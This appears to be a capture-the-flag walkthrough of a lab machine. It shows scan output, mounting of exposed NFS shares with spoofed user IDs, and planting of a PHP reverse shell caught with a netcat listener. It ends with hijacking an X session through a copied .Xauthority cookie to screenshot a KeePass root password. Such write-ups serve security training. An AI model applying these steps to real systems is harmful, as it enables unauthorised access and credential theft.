πŸ“š Table of Contents

Enumeration

$ sudo rustscan -t 3000 --tries 2 -b 8192 -u 16384 -a 10.129.228.109 -- -sS -sV -sC -oN 10.129.228.109.$(basename $PWD).nmap.txt
Open 10.129.228.109:22
Open 10.129.228.109:80
Open 10.129.228.109:111
Open 10.129.228.109:2049
Open 10.129.228.109:32955
Open 10.129.228.109:33383
Open 10.129.228.109:43643
Open 10.129.228.109:59091
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sS -sV -sC -oN 10.129.228.109.squashed.nmap.txt" on ip 10.129.228.109
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-11-26 13:49 PST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
Initiating Ping Scan at 13:49
Scanning 10.129.228.109 [4 ports]
Completed Ping Scan at 13:49, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:49
Completed Parallel DNS resolution of 1 host. at 13:49, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:49
Scanning 10.129.228.109 [8 ports]
Discovered open port 111/tcp on 10.129.228.109
Discovered open port 22/tcp on 10.129.228.109
Discovered open port 59091/tcp on 10.129.228.109
Discovered open port 32955/tcp on 10.129.228.109
Discovered open port 80/tcp on 10.129.228.109
Discovered open port 2049/tcp on 10.129.228.109
Discovered open port 33383/tcp on 10.129.228.109
Discovered open port 43643/tcp on 10.129.228.109
Completed SYN Stealth Scan at 13:49, 0.27s elapsed (8 total ports)
Initiating Service scan at 13:49
Scanning 8 services on 10.129.228.109
Completed Service scan at 13:49, 7.82s elapsed (8 services on 1 host)
NSE: Script scanning 10.129.228.109.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 4.51s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.59s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
Nmap scan report for 10.129.228.109
Host is up, received echo-reply ttl 63 (0.18s latency).
Scanned at 2022-11-26 13:49:23 PST for 14s

PORT      STATE SERVICE  REASON         VERSION
22/tcp    open  ssh      syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
|   256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp    open  http     syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp   open  rpcbind  syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      33383/tcp   mountd
|   100005  1,2,3      42507/udp   mountd
|   100005  1,2,3      43916/udp6  mountd
|   100005  1,2,3      56401/tcp6  mountd
|   100021  1,3,4      32955/tcp   nlockmgr
|   100021  1,3,4      38345/tcp6  nlockmgr
|   100021  1,3,4      41545/udp6  nlockmgr
|   100021  1,3,4      45219/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  syn-ack ttl 63 3 (RPC #100227)
32955/tcp open  nlockmgr syn-ack ttl 63 1-4 (RPC #100021)
33383/tcp open  mountd   syn-ack ttl 63 1-3 (RPC #100005)
43643/tcp open  mountd   syn-ack ttl 63 1-3 (RPC #100005)
59091/tcp open  mountd   syn-ack ttl 63 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:49
Completed NSE at 13:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
           Raw packets sent: 12 (504B) | Rcvd: 11 (460B)
Ports Service Notes
22 ssh
80 web server
111 rpc
2049 nfs

Exploitation

I saw we have ports 111 and 2049 which tell me there’s an NFS server and possibly something we can remotely mount and read.

We had to create some temporary users to map the UIDs and GIDs so we created a β€œross” user with UID/GID 1001/1001 and we created an alex user with UID/GID 2017/2017. This allowed us to write files as alex to /var/www/html so we mounted /var/www/html and uploaded a PHP reverse shell. This allowed us to get the user flag.

$ showmount -e $ip    
Export list for 10.129.228.109:
/home/ross    *
/var/www/html *

$ sudo mount -t nfs $ip:/home/ross /tmp/nfsmount
$ tree /tmp/nfsmount
/tmp/nfsmount
β”œβ”€β”€ Desktop
β”œβ”€β”€ Documents
β”‚Β Β  └── Passwords.kdbx
β”œβ”€β”€ Downloads
β”œβ”€β”€ Music
β”œβ”€β”€ Pictures
β”œβ”€β”€ Public
β”œβ”€β”€ Templates
└── Videos

$ sudo mount -t nfs -o rw $ip:/var/www/html /tmp/nfsmount
$ echo 'php shell' > /tmp/nfsmount/rev.php
$ nc -lvnp 32000
# Browse to <http://$ip/rev.php>
$ cat /home/alex/user.txt
user-flag

Privilege Escalation

From here the privilege escalation was a little tricky and I had to Google a lot about the .Xauthority file, session hijacking, and additionally read the writeup to learn about dumping a screenshot of the remote X window sessions with xwd and to read the dumped X image with xwud.

# On the mounted /home/ross mount
$ cat .Xauthority | base64

# On the reverse shell as alex
$ echo -n 'AQAADHN....' | base64 -d > /tmp/xauth
$ export XAUTHORITY=/tmp/xauth
$ xauth list
squashed.htb/unix:0  MIT-MAGIC-COOKIE-1  218a2a0921d8a7d657cea649446baae8
$ xwd -root -screen -silent -display :0 > /var/www/html/screen.xwd

# Download the screen dump at <http://$ip/screen.xwd> to attacker box

# Back on the attacker box
$ xwud -in screen.xwd

From running the xwud command we get a screenshot of the desktop of the ross user with a lovely shot of his Keepass database open with the password for the root user in the image.

Using this password we can escalate to root and get the user flag.

su - root